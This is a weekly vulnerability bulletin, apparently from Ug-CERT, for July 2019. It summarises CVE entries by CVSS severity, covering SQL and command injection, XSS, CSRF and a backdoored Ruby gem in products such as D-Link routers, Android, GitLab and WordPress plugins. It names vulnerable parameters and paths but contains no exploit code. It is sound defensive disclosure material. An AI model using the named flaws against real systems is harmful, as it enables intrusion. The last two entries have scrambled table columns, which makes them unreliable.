Vulnerability Summary for the Week of July 8, 2019

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:

• High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0
• Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9
• Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by Ug-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of Ug-CERT analysis.

High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

contao -- contao | Contao 4.x allows SQL Injection. Fixed in Contao 4.4.39 and Contao 4.7.5. | 2019-07-09 | 7.5 | CVE-2019-11512 (MISC)

dlink -- central_wifimanager | /web/Lib/Action/IndexAction.class. in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication. | 2019-07-06 | 7.5 | CVE-2019-13372 (MISC, CONFIRM, MISC)

dlink -- central_wifimanager | An issue was discovered in the D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6. Input does not get validated and arbitrary SQL statements can be executed in the database via the /web/Public/Conn.php parameter dbSQL. | 2019-07-06 | 7.5 | CVE-2019-13373 (MISC, CONFIRM, MISC)

dlink -- central_wifimanager | A SQL Injection was discovered in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 in PayAction.class.php with the index.php/Pay/passcodeAuth parameter passcode. The vulnerability does not need any authentication. | 2019-07-06 | 7.5 | CVE-2019-13375 (MISC, CONFIRM, MISC)

dlink -- dir-655_firmware | D-Link DIR-655 C devices before 3.02B05 BETA03 allow remote attackers to execute arbitrary commands via shell metacharacters in the online_firmware_check.cgi check_fw_url parameter. | 2019-07-11 | 10.0 | CVE-2019-13561 (MISC, MISC, MISC)

dlink -- dir-818lw_firmware | An issue was discovered on D-Link DIR-818LW devices with firmware 2.06betab01. There is a command injection in HNAP1 (exploitable with Authentication) via shell metacharacters in the MTU field to SetWanSettings. | 2019-07-10 | 9.0 | CVE-2019-13481 (BID, MISC)

dlink -- dir-818lw_firmware | An issue was discovered on D-Link DIR-818LW devices with firmware 2.06betab01. There is a command injection in HNAP1 (exploitable with Authentication) via shell metacharacters in the Type field to SetWanSettings. | 2019-07-10 | 10.0 | CVE-2019-13482 (BID, MISC)

fortinet -- fcm-mb40_firmware | Dynacolor FCM-MB40 v1.2.0.0 devices allow remote attackers to execute arbitrary commands via a crafted parameter to a CGI script, as demonstrated by sed injection in cgi-bin/camctrl_save_profile.cgi (save parameter) and cgi-bin/ddns.cgi. | 2019-07-07 | 9.0 | CVE-2019-13398 (MISC)

google -- android | In ihevcd_sao_shift_ctb of ihevcd_sao.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-130023983. | 2019-07-08 | 9.3 | CVE-2019-2106 (CONFIRM)

google -- android | In ihevcd_parse_pps of ihevcd_parse_headers.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-130024844. | 2019-07-08 | 9.3 | CVE-2019-2107 (CONFIRM)

google -- android | In MakeMPEG4VideoCodecSpecificData of AVIExtractor.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1. Android ID: A-130651570. | 2019-07-08 | 9.3 | CVE-2019-2109 (CONFIRM)

google -- android | In loop of DnsTlsSocket.cpp, there is a possible heap memory corruption due to a use after free. This could lead to remote code execution in the netd server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-122856181. | 2019-07-08 | 7.5 | CVE-2019-2111 (CONFIRM)

google -- android | In several functions of alarm.cc, there is possible memory corruption due to a use after free. This could lead to local code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-117997080. | 2019-07-08 | 7.2 | CVE-2019-2112 (CONFIRM)

hidea -- az_admin | hidea.com AZ Admin 1.0 has news_det.php?cod= SQL Injection. | 2019-07-11 | 7.5 | CVE-2019-13507 (MISC)

hsycms -- hsycms | An issue was discovered in Hsycms V1.1. There is a SQL injection vulnerability via a /news/*.html page. | 2019-07-10 | 7.5 | CVE-2019-10653 (MISC)

oniguruma_project -- oniguruma | A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust. | 2019-07-10 | 7.5 | CVE-2019-13224 (CONFIRM)

strong_password_project -- strong_password | The strong_password gem 0.0.7 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. The current version, without this backdoor, is 0.0.6. | 2019-07-08 | 7.5 | CVE-2019-13354 (MISC, MISC, MISC, MISC)

teclib-edition -- fields | An issue was discovered in the Teclib Fields plugin through 1.9.2 for GLPI. It allows SQL Injection via container_id and old_order parameters to ajax/reorder.php by an unauthenticated user. | 2019-07-10 | 7.5 | CVE-2019-12723 (MISC, MISC, CONFIRM)

trape_project -- trape | Trape through 2019-05-08 has SQL injection via the data[2] variable in core/db.py, as demonstrated by the /bs t parameter. | 2019-07-10 | 7.5 | CVE-2019-13489 (MISC)

typo3 -- typo3 | TYPO3 8.x through 8.7.26 and 9.x through 9.5.7 allows Deserialization of Untrusted Data. | 2019-07-09 | 7.5 | CVE-2019-12747 (CONFIRM)

vivotek -- fd8136_firmware | Vivotek FD8136 devices allow Remote Command Injection, related to BusyBox and wget. | 2019-07-10 | 10.0 | CVE-2018-14494 (MISC, MISC)

vivotek -- fd8136_firmware | Vivotek FD8136 devices allow Remote Command Injection, aka "another command injection vulnerability in our target device," a different issue than CVE-2018-14494. | 2019-07-10 | 10.0 | CVE-2018-14495 (MISC, MISC)

vivotek -- fd8136_firmware | Vivotek FD8136 devices allow remote memory corruption and remote code execution because of a stack-based buffer overflow, related to sprintf, vlocal_buff_4326, and set_getparam.cgi. | 2019-07-10 | 7.5 | CVE-2018-14496 (MISC, MISC)

yoast -- yoast_seo | The Yoast SEO plugin before 11.6-RC5 for WordPress does not properly restrict unfiltered HTML in term descriptions. | 2019-07-09 | 7.5 | CVE-2019-13478 (MISC)


Medium Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info

alsa-project -- alsa | posix/JackSocket.cpp in libjack in JACK2 1.9.1 through 1.9.12 (as distributed with alsa-plugins 1.1.7 and later) has a "double file descriptor close" issue during a failed connection attempt when jackd2 is not running. Exploitation success depends on multithreaded timing of that double close, which can result in unintended information disclosure, crashes, or file corruption due to having the wrong file associated with the file descriptor. | 2019-07-05 | 6.8 | CVE-2019-13351 (MISC, MISC)

apachefriends -- xampp | iart.php in XAMPP 1.7.0 has XSS, a related issue to CVE-2008-3569. | 2019-07-09 | 4.3 | CVE-2019-8920 (BID, MISC)

cesanta -- mongoose | mq_parse_http in mongoose.c in Mongoose 6.15 has a heap-based buffer over-read. | 2019-07-10 | 5.0 | CVE-2019-13503 (MISC, MISC)

cisco -- unified_communications_manager | A vulnerability in the Session Initiation Protocol (SIP) protocol implementation of Cisco Unified Communications Manager could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient validation of input SIP traffic. An attacker could exploit this vulnerability by sending a malformed SIP packet to an affected Cisco Unified Communications Manager. A successful exploit could allow the attacker to trigger a new registration process on all connected phones, temporarily disrupting service. | 2019-07-05 | 5.0 | CVE-2019-1887 (CISCO)

codedoc_project -- codedoc | Codedoc v3.2 has a stack-based buffer overflow in add_variable in codedoc.c, related to codedoc_strlcpy. | 2019-07-06 | 6.8 | CVE-2019-13362 (MISC)

crudlab -- wp_like_button | An authentication bypass vulnerability in the CRUDLab WP Like Button plugin through 1.6.0 for WordPress allows unauthenticated attackers to change settings. The contains() function in wp_like_button.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update settings, as demonstrated by the wp-admin/admin.php?page=facebook-like-button each_page_url or code_snippet parameter. | 2019-07-05 | 5.0 | CVE-2019-13344 (MISC, MISC, MISC)

custom4web -- wp_open_graph | Cross-site request forgery (CSRF) vulnerability in WP Open Graph 1.6.1 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. | 2019-07-05 | 6.8 | CVE-2019-5960 (JVN)

digisol -- dg-hr-3300_firmware | Digisol Wireless Wifi Home Router HR-3300 allows XSS via the userid or password parameter to the admin login page. | 2019-07-05 | 4.3 | CVE-2018-14027 (MISC)

dlink -- central_wifimanager | A cross-site scripting (XSS) vulnerability in resource view in PayAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to inject arbitrary web script or HTML via the index.php/Pay/passcodeAuth passcode parameter. | 2019-07-06 | 4.3 | CVE-2019-13374 (MISC, CONFIRM, MISC)

dlink -- dir-655_firmware | D-Link DIR-655 C devices before 3.02B05 BETA03 allow remote attackers to force a blank password via the apply_sec.cgi setup_wizard parameter. | 2019-07-11 | 5.0 | CVE-2019-13560 (MISC, MISC, MISC)

dlink -- dir-655_firmware | D-Link DIR-655 C devices before 3.02B05 BETA03 allow XSS, as demonstrated by the /www/ping_response.cgi ping_ipaddr parameter, the /www/ping6_response.cgi ping6_ipaddr parameter, and the /www/apply_sec.cgi html_response_return_page parameter. | 2019-07-11 | 4.3 | CVE-2019-13562 (MISC, MISC, MISC)

dlink -- dir-655_firmware | D-Link DIR-655 C devices before 3.02B05 BETA03 allow CSRF for the entire management console. | 2019-07-11 | 6.8 | CVE-2019-13563 (MISC, MISC, MISC)

dropbox -- dropbox | Dropbox.exe (and QtWebEngineProcess.exe in the Web Helper) in the Dropbox desktop application 71.4.108.0 store cleartext credentials in memory upon successful login or new account creation. These are not securely freed in the running process. | 2019-07-08 | 4.3 | CVE-2019-12171 (MISC, MISC)

dwbooster -- appointment_hour_booking | The Appointment Hour Booking plugin 1.1.44 for WordPress allows XSS via the E-mail field, as demonstrated by email_1. | 2019-07-11 | 4.3 | CVE-2019-13505 (MISC, MISC)

enhancesoft -- osticket | Unauthenticated Stored XSS in osTicket 1.10.1 allows a remote attacker to gain admin privileges by injecting arbitrary web script or HTML via arbitrary file extension while creating a support ticket. | 2019-07-09 | 4.3 | CVE-2019-13397 (MISC)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. /htdocs/switch.php has an Open Redirect via the current_page parameter. | 2019-07-05 | 5.8 | CVE-2018-12621 (MISC, CONFIRM)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. htdocs/ajax/update.php has XSS via the field_name parameter. | 2019-07-10 | 4.3 | CVE-2018-12622 (MISC, CONFIRM)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. htdocs/switch.php has XSS via the current_page parameter. | 2019-07-10 | 4.3 | CVE-2018-12623 (MISC, CONFIRM)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. /htdocs/validate.php has XSS via the values parameter. | 2019-07-10 | 4.3 | CVE-2018-12625 (MISC, CONFIRM)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. /htdocs/popup.php has XSS via the cat parameter. | 2019-07-10 | 4.3 | CVE-2018-12626 (MISC, CONFIRM)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. /htdocs/list.php has XSS via the show_notification_list_issues or show_authorized_issues parameter. | 2019-07-10 | 4.3 | CVE-2018-12627 (MISC, CONFIRM)

eventum_project -- eventum | An issue was discovered in Eventum 3.5.0. CSRF in htdocs/manage/users.php allows creating another user with admin privileges. | 2019-07-10 | 6.8 | CVE-2018-12628 (MISC, CONFIRM)

exiv2 -- exiv2 | There is an out-of-bounds read in Exiv2::MrwImage::readMetadata in mrwimage.cpp in Exiv2 through 0.27.2. | 2019-07-10 | 4.3 | CVE-2019-13504 (BID, MISC, MISC)

ffmpeg -- ffmpeg | In FFmpeg 4.1.3, there is a division by zero at adx_write_trailer in libavformat/rawenc.c. This may be related to two NULL pointers passed as arguments at libavcodec/frame_thread_encoder.c. | 2019-07-07 | 4.3 | CVE-2019-13390 (BID, MISC, MISC, MISC, MISC, MISC)

fla-shop -- html5_maps | Cross-site request forgery (CSRF) vulnerability in HTML5 Maps 1.6.5.6 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. | 2019-07-05 | 6.8 | CVE-2019-5983 (MISC, MISC, MISC)

flarum -- flarum | Flarum before 0.1.0-beta.9 allows CSRF against all POST endpoints, as demonstrated by changing admin settings. | 2019-07-07 | 6.8 | CVE-2019-13183 (CONFIRM, MISC, CONFIRM)

fortinet -- fcm-mb40_firmware | Dynacolor FCM-MB40 v1.2.0.0 devices have a hard-coded SSL/TLS key that is used during an administrator's SSL conversation. | 2019-07-07 | 4.3 | CVE-2019-13399 (MISC)

fortinet -- fcm-mb40_firmware | Dynacolor FCM-MB40 v1.2.0.0 devices use /etc/appWeb/appweb.pass to store administrative web-interface credentials in cleartext. These credentials can be retrieved via cgi-bin/getuserinfo.cgi?mode=info. | 2019-07-07 | 5.0 | CVE-2019-13400 (MISC)

fortinet -- fcm-mb40_firmware | Dynacolor FCM-MB40 v1.2.0.0 devices have CSRF in all scripts under cgi-bin/. | 2019-07-07 | 6.8 | CVE-2019-13401 (MISC)

fortinet -- fcm-mb40_firmware | /usr/sbin/default.sh and /usr/apache/htdocs/cgi-bin/admin/hardfactorydefault.cgi on Dynacolor FCM-MB40 v1.2.0.0 devices implement an incomplete factory-reset process. A backdoor can persist because neither system accounts nor the set of services is reset. | 2019-07-07 | 6.5 | CVE-2019-13402 (MISC)

gitea -- gitea | Gitea 1.7.2, 1.7.3 is affected by: Cross Site Scripting (XSS). The impact is: execute JavaScript in victim's browser, when the vulnerable repo page is loaded. The component is: repository's description. The attack vector is: victim must navigate to public and affected repo page. | 2019-07-11 | 4.3 | CVE-2019-1010314 (MISC)

gitlab -- gitlab | An issue was discovered in GitLab Community and Enterprise Edition 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1. There is a persistent XSS vulnerability in the environment pages due to a lack of input validation and output encoding. | 2019-07-10 | 4.3 | CVE-2018-19493 (BID, CONFIRM, MISC)

gitlab -- gitlab | An issue was discovered in GitLab Community and Enterprise Edition 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1. There is an incorrect access vulnerability that allows an unauthorized user to view private group names. | 2019-07-10 | 4.0 | CVE-2018-19494 (CONFIRM, MISC)

gitlab -- gitlab | An issue was discovered in GitLab Community and Enterprise Edition before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1. There is an SSRF vulnerability in the Prometheus integration. | 2019-07-10 | 4.0 | CVE-2018-19495 (CONFIRM, MISC)

gitlab -- gitlab | An issue was discovered in GitLab Community and Enterprise Edition 10.x and 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1. There is an incorrect access control vulnerability that permits a user with insufficient privileges to promote a project milestone to a group milestone. | 2019-07-10 | 4.0 | CVE-2018-19496 (CONFIRM, MISC)

gitlab -- gitlab | GitLab CE/EE, versions 8.8 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an authorization vulnerability that allows access to the web-UI as a user using a Personal Access Token of any scope. | 2019-07-10 | 6.5 | CVE-2018-19569 (BID, CONFIRM, MISC)

gitlab -- gitlab | GitLab CE/EE, versions 8.18 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an SSRF vulnerability in webhooks. | 2019-07-10 | 4.0 | CVE-2018-19571 (MISC, MISC)

gitlab -- gitlab | GitLab CE 8.17 and later and EE 8.3 and later have a symlink time-of-check-to-time-of-use race condition that would allow unauthorized access to files in the GitLab Pages chroot environment. This is fixed in versions 11.5.1, 11.4.8, and 11.3.11. | 2019-07-10 | 4.3 | CVE-2018-19572 (CONFIRM, MISC)

gitlab -- gitlab | GitLab CE/EE, versions 10.1 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an insecure direct object reference issue that allows a user to make comments on a locked issue. | 2019-07-10 | 4.0 | CVE-2018-19575 (BID, CONFIRM, MISC)

gitlab -- gitlab | GitLab CE/EE, versions 8.6 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an access control issue that allows a Guest user to make changes to or delete their own comments on an issue, after the issue was made Confidential. | 2019-07-10 | 6.4 | CVE-2018-19576 (MISC, MISC)

gitlab -- gitlab | Gitlab CE/EE, versions 8.6 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an incorrect access control vulnerability that displays to an unauthorized user the title and namespace of a confidential issue. | 2019-07-10 | 5.0 | CVE-2018-19577 (CONFIRM, MISC)

gitlab -- gitlab | GitLab EE, version 11.5 before 11.5.1, is vulnerable to an insecure object reference issue that permits a user with Reporter privileges to view the Jaeger Tracing Operations page. | 2019-07-10 | 4.0 | CVE-2018-19578 (CONFIRM, MISC)

gitlab -- gitlab | All versions of GitLab prior to 11.5.1, 11.4.8, and 11.3.11 do not send an email to the old email address when an email address change is made. | 2019-07-10 | 5.0 | CVE-2018-19580 (CONFIRM, MISC)

gitlab -- gitlab | GitLab EE, versions 8.3 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, is vulnerable to an insecure object reference vulnerability that allows a Guest user to set the weight of an issue they create. | 2019-07-10 | 5.0 | CVE-2018-19581 (CONFIRM, MISC)

gitlab -- gitlab | GitLab EE, versions 11.4 before 11.4.8 and 11.5 before 11.5.1, is affected by an insecure direct object reference vulnerability that permits an unauthorized user to publish the draft merge request comments of another user. | 2019-07-10 | 4.0 | CVE-2018-19582 (CONFIRM, MISC)

gitlab -- gitlab | GitLab CE/EE, versions 8.0 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, would log access tokens in the Workhorse logs, permitting administrators with access to the logs to see another user's token. | 2019-07-10 | 4.0 | CVE-2018-19583 (CONFIRM, MISC)

gitlab -- gitlab | GitLab EE, versions 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, is vulnerable to an insecure direct object reference vulnerability that allows authenticated, but unauthorized, users to view members and milestone details of private groups. | 2019-07-10 | 5.0 | CVE-2018-19584 (CONFIRM, MISC)

google -- android | In FileInputStream::Read of file_input_stream.cc, there is a possible memory corruption due to uninitialized data. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-116114182. | 2019-07-08 | 6.8 | CVE-2019-2105 (CONFIRM)

google -- android | In save_attr_seq of sdp_discovery.cc, there is a possible out-of-bound read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-117105007. | 2019-07-08 | 5.0 | CVE-2019-2116 (CONFIRM)

helpy.io -- helpy | Helpy before 2.2.0 allows agents to edit admins. | 2019-07-10 | 6.5 | CVE-2018-20851 (MISC, MISC)

ibm -- cloud_application_performance_management | IBM Application Performance Management (IBM Monitoring 8.1.4) could allow a remote attacker to induce the application to perform server-side DNS lookups of arbitrary domain names. IBM X-Force ID: 158270. | 2019-07-11 | 5.0 | CVE-2019-4131 (XF, CONFIRM)

ibm -- jazz_for_service_management | IBM Jazz for Service Management 1.1.3 and 1.1.3.2 stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 159032. | 2019-07-11 | 5.0 | CVE-2019-4193 (CONFIRM, XF)

idoors -- idoors_reader | iDoors Reader 2.10.17 and earlier allows an attacker on the same network segment to bypass authentication to access the management console and operate the product via unspecified vectors. | 2019-07-05 | 5.8 | CVE-2019-5964 (MISC, MISC)

ignitedcms_project -- ignitedcms | index.php/admin/permissions in Ignited CMS through 2017-02-19 allows CSRF to add an administrator. | 2019-07-06 | 6.8 | CVE-2019-13370 (MISC)

imagemagick -- imagemagick | In ImageMagick 7.0.8-50 Q16, ComplexImages in MagickCore/fourier.c has a heap-based buffer over-read because of incorrect calls to GetCacheViewVirtualPixels. | 2019-07-07 | 6.8 | CVE-2019-13391 (MISC, MISC, MISC)

imagemagick -- imagemagick | ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c. | 2019-07-09 | 4.3 | CVE-2019-13454 (BID, MISC, MISC, MISC)

intersystems -- cache | Intersystems Cache 2017.2.2.865.0 allows XSS. | 2019-07-11 | 4.3 | CVE-2018-17150 (MISC)

intersystems -- cache | Intersystems Cache 2017.2.2.865.0 has Incorrect Access Control. | 2019-07-11 | 5.5 | CVE-2018-17151 (MISC)

intersystems -- cache | Intersystems Cache 2017.2.2.865.0 allows XXE. | 2019-07-11 | 5.5 | CVE-2018-17152 (MISC)

invoxia -- nvx220_firmware | Invoxia NVX220 devices allow access to /bin/sh via escape from a restricted CLI, leading to disclosure of password hashes. | 2019-07-05 | 5.0 | CVE-2018-14529 (MISC)

joruri -- joruri_cms_2017 | Cross-site scripting vulnerability in Joruri CMS 2017 Release2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | 2019-07-05 | 4.3 | CVE-2019-5967 (MISC, MISC)

joruri -- joruri_mail | Open redirect vulnerability in Joruri Mail 2.1.4 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. | 2019-07-05 | 5.8 | CVE-2019-5965 (MISC, MISC)

joruri -- joruri_mail | Joruri Mail 2.1.4 and earlier does not properly manage sessions, which allows remote attackers to impersonate an arbitrary user and alter/disclose the information via unspecified vectors. | 2019-07-05 | 5.8 | CVE-2019-5966 (MISC, MISC)

keynto -- team_password_manager | KEYNTO Team Password Manager 1.5.0 allows XSS because data saved from websites is mishandled in the online vault. | 2019-07-09 | 4.3 | CVE-2019-13380 (FULLDISC)

libpng -- libpng | An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png. | 2019-07-10 | 6.8 | CVE-2018-14550 (MISC, MISC)

mailvelope -- mailvelope | Mailvelope prior to 3.1.0 is vulnerable to a clickjacking attack against the settings page. As the settings page is intended to be accessible from web applications, the browser's extension isolation mechanisms are disabled (web_accessible_resources). Mailvelope implements additional measures to prevent web applications from directly embedding the settings page, but this mechanism can be bypassed. | 2019-07-09 | 4.3 | CVE-2019-9147 (CONFIRM)

mailvelope -- mailvelope | Mailvelope prior to 3.3.0 accepts or operates with invalid PGP public keys: Mailvelope allows importing keys that contain users without a valid self-certification. Keys that are obviously invalid are not rejected during import. An attacker that is able to get a victim to import a manipulated key could claim to have signed a message that originates from another person. | 2019-07-09 | 4.3 | CVE-2019-9148 (CONFIRM)

mailvelope -- mailvelope | Mailvelope prior to 3.3.0 allows private key operations without user interaction via its client-API. By modifying a URL parameter in Mailvelope, an attacker is able to sign (and encrypt) arbitrary messages with Mailvelope, assuming the private key password is cached. A second vulnerability allows an attacker to decrypt an arbitrary message when the GnuPG backend is used in Mailvelope. | 2019-07-09 | 6.4 | CVE-2019-9149 (CONFIRM)

mailvelope -- mailvelope | Mailvelope prior to 3.3.0 does not require user interaction to import public keys shown on a web page. This functionality can be tricked to either hide a key import from the user or obscure which key was imported. | 2019-07-09 | 5.0 | CVE-2019-9150 (CONFIRM)

mastodon-tootdon -- tootdon_for_mastodon | The Android App 'Tootdon for Mastodon' version 3.4.1 and earlier does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. | 2019-07-05 | 5.8 | CVE-2019-5961 (MISC, MISC)

mediawiki -- mediawiki | Wikimedia MediaWiki through 1.32.1 allows CSRF. | 2019-07-10 | 6.8 | CVE-2019-12466 (CONFIRM, MISC, BUGTRAQ, DEBIAN)

mediawiki -- mediawiki | Wikimedia MediaWiki 1.23.0 through 1.32.1 has an information leak. Privileged API responses that include whether a recent change has been patrolled may be cached publicly. Fixed in 1.32.2, 1.31.2, 1.30.2 and 1.27.6. | 2019-07-10 | 5.0 | CVE-2019-12474 (CONFIRM, MISC, BUGTRAQ, DEBIAN)

odoo -- odoo | The Odoo Community Association (OCA) dbfilter_from_header module makes Odoo 8.x, 9.x, 10.x, and 11.x vulnerable to ReDoS (regular expression denial of service) under certain circumstances. | 2019-07-05 | 5.0 | CVE-2018-14733 (CONFIRM, MISC, MISC, MISC, MISC)

oniguruma_project -- oniguruma | A NULL Pointer Dereference in match_at() in regexec.c in Oniguruma 6.9.2 allows attackers to potentially cause denial of service by providing a crafted regular expression. Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust. | 2019-07-10 | 5.0 | CVE-2019-13225 (CONFIRM)

opencats -- opencats | lib/DocumentToText.php in OpenCats before 0.9.4-3 has XXE that allows remote users to read files on the underlying operating system. The attacker must upload a file in the docx or odt format. | 2019-07-05 | 4.3 | CVE-2019-13358 (MISC, MISC, MISC)

otrs -- otrs | An issue was discovered in Open Ticket Request System (OTRS) 6.0.x through 6.0.7. A carefully constructed email could be used to inject and execute arbitrary stylesheet or JavaScript code in a logged in customer's browser in the context of the OTRS customer panel application. | 2019-07-08 | 4.9 | CVE-2018-11563 (CONFIRM, CONFIRM, MISC)

paypal -- adaptive_payments_sdk | paypal/adaptivepayments-sdk-php v3.9.2 is vulnerable to a reflected XSS in SetPaymentOptions.php resulting in code execution. | 2019-07-10 | 4.3 | CVE-2017-6217 (MISC)

phpwind -- phpwind | PHPWind 9.1.0 has XSS vulnerabilities in the c and m parameters of the index.php file. | 2019-07-09 | 4.3 | CVE-2019-13472 (MISC)

pingidentity -- agentless_integration_kit | XSS exists in Ping Identity Agentless Integration Kit before 1.5. | 2019-07-11 | 4.3 | CVE-2019-13564 (CONFIRM)

pyxtrlock_project -- pyxtrlock | pyxtrlock 0.3 and earlier is affected by: Incorrect Access Control. The impact is: False locking impression when run in a non-X11 session. The fixed version is: 0.4. | 2019-07-11 | 4.6 | CVE-2019-1010316 (MISC)

sap -- information_steward | SAP Information Steward, version 4.2, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability. | 2019-07-10 | 4.3 | CVE-2019-0329 (BID, MISC, CONFIRM)

sony -- vaio_update | Improper authorization vulnerability in VAIO Update 7.3.0.03150 and earlier allows attackers to execute an arbitrary executable file with administrative privilege via unspecified vectors. | 2019-07-05 | 6.8 | CVE-2019-5981 (MISC, MISC)

sony -- vaio_update | Improper download file verification vulnerability in VAIO Update 7.3.0.03150 and earlier allows remote attackers to conduct a man-in-the-middle attack via a malicious wireless LAN access point. A successful exploitation may result in a malicious file being downloaded/executed. | 2019-07-05 | 5.4 | CVE-2019-5982 (MISC, MISC)

squid-cache -- squid | The cachemgr.cgi web module of Squid through 4.7 has XSS via the user_name or auth parameter. | 2019-07-05 | 4.3 | CVE-2019-13345 (MISC, MISC, MLIST)

sukimalab -- attendance_manager | Cross-site scripting vulnerability in Attendance Manager 0.5.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | 2019-07-05 | 4.3 | CVE-2019-5970 (MISC, MISC, MISC, MISC)

sukimalab -- attendance_manager | Cross-site request forgery (CSRF) vulnerability in Attendance Manager 0.5.6 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. | 2019-07-05 | 6.8 | CVE-2019-5971 (MISC, MISC, MISC, MISC)

sukimalab -- online_lesson_booking | Cross-site scripting vulnerability in Online Lesson Booking 0.8.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. | 2019-07-05 | 4.3 | CVE-2019-5972 (MISC, MISC, MISC)

teclib-edition -- fields | An issue was discovered in the Teclib News plugin through 1.5.2 for GLPI. It allows a stored XSS attack via the $_POST['name'] parameter. | 2019-07-10 | 4.3 | CVE-2019-12724 (MISC, MISC, CONFIRM)

trape_project -- trape | A cross-site scripting (XSS) vulnerability in static/js/trape.js in Trape through 2019-05-08 allows remote attackers to inject arbitrary web script or HTML via the country, query, or refer parameter to the /register URI, because the jQuery prepend() method is used. | 2019-07-10 | 4.3 | CVE-2019-13488 (MISC)

typo3 -- typo3 | TYPO3 8.3.0 through 8.7.26 and 9.0.0 through 9.5.7 allows XSS. | 2019-07-09 | 4.3 | CVE-2019-12748 (CONFIRM)

Cross-site request CVE- forgery (CSRF) 2019- vulnerability in Custom waspthemes -- 2019- 5984 CSS Pro 1.0.3 and 6.8 custom_css_pro 07-05 MISC earlier allows remote MISC attackers to hijack the MISC authentication of CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info

administrators via unspecified vectors.

Cross-site request forgery (CSRF) vulnerability in CVE- GROWI v3.4.6 and 2019- earlier allows remote 2019- weseek -- growi 6.8 5968 attackers to hijack the 07-05 MISC authentication of MISC administrators via updating user's 'Basic Info'.

